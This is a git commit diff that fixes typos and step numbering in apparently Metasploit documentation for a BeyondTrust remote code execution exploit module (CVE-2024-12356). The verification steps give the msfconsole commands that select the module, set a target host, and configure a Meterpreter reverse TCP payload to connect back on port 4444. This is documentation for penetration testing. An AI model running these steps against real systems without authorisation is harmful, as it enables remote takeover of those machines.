fix typos in docs

This commit is contained in:
sfewer-r7
2025-02-12 17:22:17 +00:00
parent c6d03069a9
commit c9be9b65ec
@@ -11,13 +11,13 @@ to acquire the relevant software packages.
## Verification Steps
1. Start msfconsole
2. `use exploit/linux/http/beyondtrust_rce_cve_2024_12356.`
2. `use exploit/linux/http/beyondtrust_rce_cve_2024_12356`
3. `set RHOST <TARGET_IP_ADDRESS>`
4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
5. `set LHOST eth0`
5. `set LPORT 4444`
6. `check`
7. `exploit`
6. `set LPORT 4444`
7. `check`
8. `exploit`
## Options